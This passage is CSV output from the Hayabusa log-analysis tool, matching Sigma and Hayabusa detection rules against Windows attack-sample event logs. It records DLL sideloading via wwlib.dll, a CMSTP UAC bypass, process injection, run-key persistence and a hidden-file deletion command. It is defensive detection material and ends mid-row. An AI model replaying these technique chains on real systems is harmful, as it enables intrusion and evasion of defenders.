+09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 
00247C92-09FE-5F86-0000-0010AC861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx 2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx 2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,../hayabusa-rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 
747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:31.484 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 
747F3D96-D8E5-5F8A-0000-0010E1BC7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent 
Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,../hayabusa-rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:45.130 
+09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: 
http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: 
https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command 
and Control/bits_openvpn.evtx 2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job 
Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 